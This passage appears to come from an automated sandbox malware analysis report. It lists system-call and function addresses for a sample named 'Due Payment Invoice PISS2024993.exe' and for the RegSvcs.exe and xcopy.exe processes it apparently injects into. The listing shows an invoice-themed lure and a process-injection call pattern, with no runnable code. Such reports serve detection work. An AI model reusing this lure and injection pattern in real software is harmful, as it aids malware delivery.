                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01022AB0 NtWaitForSingleObject,3_2_01022AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01022AD0 NtReadFile,3_2_01022AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01022AF0 NtWriteFile,3_2_01022AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01022D00 NtSetInformationFile,3_2_01022D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01022D10 NtMapViewOfSection,3_2_01022D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01022D30 NtUnmapViewOfSection,3_2_01022D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01022DB0 NtEnumerateKey,3_2_01022DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01022DD0 NtDelayExecution,3_2_01022DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01022C00 NtQueryInformationProcess,3_2_01022C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01022C60 NtCreateKey,3_2_01022C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01022CA0 NtQueryInformationToken,3_2_01022CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01022CC0 NtQueryVirtualMemory,3_2_01022CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01022CF0 NtOpenProcess,3_2_01022CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01022F30 NtCreateSection,3_2_01022F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01022F60 NtCreateProcessEx,3_2_01022F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01022F90 NtProtectVirtualMemory,3_2_01022F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01022FA0 NtQuerySection,3_2_01022FA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01022FB0 NtResumeThread,3_2_01022FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01022FE0 NtCreateFile,3_2_01022FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01022E30 NtWriteVirtualMemory,3_2_01022E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01022E80 NtReadVirtualMemory,3_2_01022E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01022EA0 NtAdjustPrivilegesToken,3_2_01022EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01022EE0 NtQueueApcThread,3_2_01022EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01023010 NtOpenDirectoryObject,3_2_01023010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01023090 NtSetValueKey,3_2_01023090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010239B0 NtGetContextThread,3_2_010239B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01023D10 NtOpenProcessToken,3_2_01023D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01023D70 NtOpenThread,3_2_01023D70
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03034340 NtSetContextThread,LdrInitializeThunk,6_2_03034340
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03034650 NtSuspendThread,LdrInitializeThunk,6_2_03034650
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03032B60 NtClose,LdrInitializeThunk,6_2_03032B60
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03032BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_03032BA0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03032BE0 NtQueryValueKey,LdrInitializeThunk,6_2_03032BE0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03032BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_03032BF0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03032AD0 NtReadFile,LdrInitializeThunk,6_2_03032AD0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03032AF0 NtWriteFile,LdrInitializeThunk,6_2_03032AF0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03032F30 NtCreateSection,LdrInitializeThunk,6_2_03032F30
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03032FB0 NtResumeThread,LdrInitializeThunk,6_2_03032FB0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03032FE0 NtCreateFile,LdrInitializeThunk,6_2_03032FE0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03032E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_03032E80
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03032EE0 NtQueueApcThread,LdrInitializeThunk,6_2_03032EE0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03032D10 NtMapViewOfSection,LdrInitializeThunk,6_2_03032D10
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03032D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_03032D30
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03032DD0 NtDelayExecution,LdrInitializeThunk,6_2_03032DD0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03032DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03032DF0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03032C60 NtCreateKey,LdrInitializeThunk,6_2_03032C60
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03032C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03032C70
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03032CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_03032CA0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030335C0 NtCreateMutant,LdrInitializeThunk,6_2_030335C0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030339B0 NtGetContextThread,LdrInitializeThunk,6_2_030339B0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03032B80 NtQueryInformationFile,6_2_03032B80
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03032AB0 NtWaitForSingleObject,6_2_03032AB0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03032F60 NtCreateProcessEx,6_2_03032F60
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03032F90 NtProtectVirtualMemory,6_2_03032F90
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03032FA0 NtQuerySection,6_2_03032FA0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03032E30 NtWriteVirtualMemory,6_2_03032E30
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03032EA0 NtAdjustPrivilegesToken,6_2_03032EA0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03032D00 NtSetInformationFile,6_2_03032D00
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03032DB0 NtEnumerateKey,6_2_03032DB0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03032C00 NtQueryInformationProcess,6_2_03032C00
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03032CC0 NtQueryVirtualMemory,6_2_03032CC0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03032CF0 NtOpenProcess,6_2_03032CF0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03033010 NtOpenDirectoryObject,6_2_03033010
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03033090 NtSetValueKey,6_2_03033090
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03033D10 NtOpenProcessToken,6_2_03033D10
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03033D70 NtOpenThread,6_2_03033D70
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02828F10 NtCreateFile,6_2_02828F10
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02829200 NtClose,6_2_02829200
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02829370 NtAllocateVirtualMemory,6_2_02829370
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02829070 NtReadFile,6_2_02829070
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02829160 NtDeleteFile,6_2_02829160
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeCode function: 0_2_0149D3040_2_0149D304
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeCode function: 0_2_018203600_2_01820360
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeCode function: 0_2_01821E200_2_01821E20
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeCode function: 0_2_032974E00_2_032974E0
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeCode function: 0_2_0329001F0_2_0329001F
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeCode function: 0_2_032900400_2_03290040
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeCode function: 0_2_032974D20_2_032974D2
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeCode function: 0_2_098D50200_2_098D5020
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeCode function: 0_2_098D00400_2_098D0040
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeCode function: 0_2_098D34040_2_098D3404
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeCode function: 0_2_098DE8450_2_098DE845
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeCode function: 0_2_098DBBD10_2_098DBBD1
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeCode function: 0_2_098D1C700_2_098D1C70
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeCode function: 0_2_098DDFE90_2_098DDFE9
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeCode function: 0_2_098DDFF80_2_098DDFF8
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeCode function: 0_2_098D2E280_2_098D2E28
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeCode function: 0_2_098D20B80_2_098D20B8
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeCode function: 0_2_098DC0180_2_098DC018
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeCode function: 0_2_098D00110_2_098D0011
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeCode function: 0_2_098D50120_2_098D5012
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeCode function: 0_2_098D52A20_2_098D52A2
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeCode function: 0_2_098D52B00_2_098D52B0
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeCode function: 0_2_098D25780_2_098D2578
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeCode function: 0_2_098DB7A80_2_098DB7A8
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeCode function: 0_2_098DD7200_2_098DD720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004184333_2_00418433
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0042E9E33_2_0042E9E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041832D3_2_0041832D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004023803_2_00402380
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040FD333_2_0040FD33
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041666E3_2_0041666E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_004166733_2_00416673
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040FF533_2_0040FF53
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00402F653_2_00402F65
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00402F703_2_00402F70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040DFC93_2_0040DFC9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040DFD33_2_0040DFD3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108A1183_2_0108A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010781583_2_01078158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010B01AA3_2_010B01AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010A81CC3_2_010A81CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010820003_2_01082000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE01003_2_00FE0100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010AA3523_2_010AA352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010B03E63_2_010B03E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FFE3F03_2_00FFE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010902743_2_01090274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010702C03_2_010702C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010B05913_2_010B0591
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010944203_2_01094420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010A24463_2_010A2446
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF05353_2_00FF0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0109E4F63_2_0109E4F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010147503_2_01014750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEC7C03_2_00FEC7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF07703_2_00FF0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100C6E03_2_0100C6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD68B83_2_00FD68B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010069623_2_01006962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010BA9A63_2_010BA9A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF28403_2_00FF2840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FFA8403_2_00FFA840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF29A03_2_00FF29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101E8F03_2_0101E8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010AAB403_2_010AAB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEEA803_2_00FEEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010A6BD73_2_010A6BD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE0CF23_2_00FE0CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108CD1F3_2_0108CD1F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01008DBF3_2_01008DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF0C003_2_00FF0C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEADE03_2_00FEADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01090CB53_2_01090CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FFAD003_2_00FFAD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01032F283_2_01032F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01010F303_2_01010F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01092F303_2_01092F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01064F403_2_01064F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF0E593_2_00FF0E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106EFA03_2_0106EFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FFCFE03_2_00FFCFE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010AEE263_2_010AEE26
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE2FC83_2_00FE2FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01002E903_2_01002E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010ACE933_2_010ACE93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010AEEDB3_2_010AEEDB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF70C03_2_00FF70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010BB16B3_2_010BB16B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0102516C3_2_0102516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FFB1B03_2_00FFB1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDF1723_2_00FDF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0109F0CC3_2_0109F0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010A70E93_2_010A70E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010AF0E03_2_010AF0E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010A132D3_2_010A132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF52A03_2_00FF52A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0103739A3_2_0103739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDD34C3_2_00FDD34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100B2C03_2_0100B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010912ED3_2_010912ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010A75713_2_010A7571
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE14603_2_00FE1460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108D5B03_2_0108D5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010AF43F3_2_010AF43F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010AF7B03_2_010AF7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010A16CC3_2_010A16CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010859103_2_01085910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF38E03_2_00FF38E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100B9503_2_0100B950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105D8003_2_0105D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF99503_2_00FF9950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010AFB763_2_010AFB76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100FB803_2_0100FB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01065BF03_2_01065BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0102DBF93_2_0102DBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010AFA493_2_010AFA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010A7A463_2_010A7A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01063A6C3_2_01063A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01035AA03_2_01035AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108DAAC3_2_0108DAAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01091AA33_2_01091AA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0109DAC63_2_0109DAC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010A1D5A3_2_010A1D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010A7D733_2_010A7D73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100FDC03_2_0100FDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01069C323_2_01069C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF3D403_2_00FF3D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010AFCF23_2_010AFCF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010AFF093_2_010AFF09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF9EB03_2_00FF9EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010AFFB13_2_010AFFB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF1F923_2_00FF1F92
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030BA3526_2_030BA352
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030C03E66_2_030C03E6
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0300E3F06_2_0300E3F0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030A02746_2_030A0274
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030802C06_2_030802C0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0309A1186_2_0309A118
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030881586_2_03088158
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030C01AA6_2_030C01AA
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030B41A26_2_030B41A2
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030B81CC6_2_030B81CC
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030920006_2_03092000
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02FF01006_2_02FF0100
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030247506_2_03024750
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030007706_2_03000770
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02FFC7C06_2_02FFC7C0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0301C6E06_2_0301C6E0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030005356_2_03000535
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030C05916_2_030C0591
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030A44206_2_030A4420
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030B24466_2_030B2446
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030AE4F66_2_030AE4F6
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030BAB406_2_030BAB40
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02FFEA806_2_02FFEA80
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030B6BD76_2_030B6BD7
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02FE68B86_2_02FE68B8
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030169626_2_03016962
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030029A06_2_030029A0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030CA9A66_2_030CA9A6
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0300A8406_2_0300A840
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030028406_2_03002840
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0302E8F06_2_0302E8F0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03042F286_2_03042F28
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03020F306_2_03020F30
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030A2F306_2_030A2F30
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03074F406_2_03074F40
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0307EFA06_2_0307EFA0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0300CFE06_2_0300CFE0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030BEE266_2_030BEE26
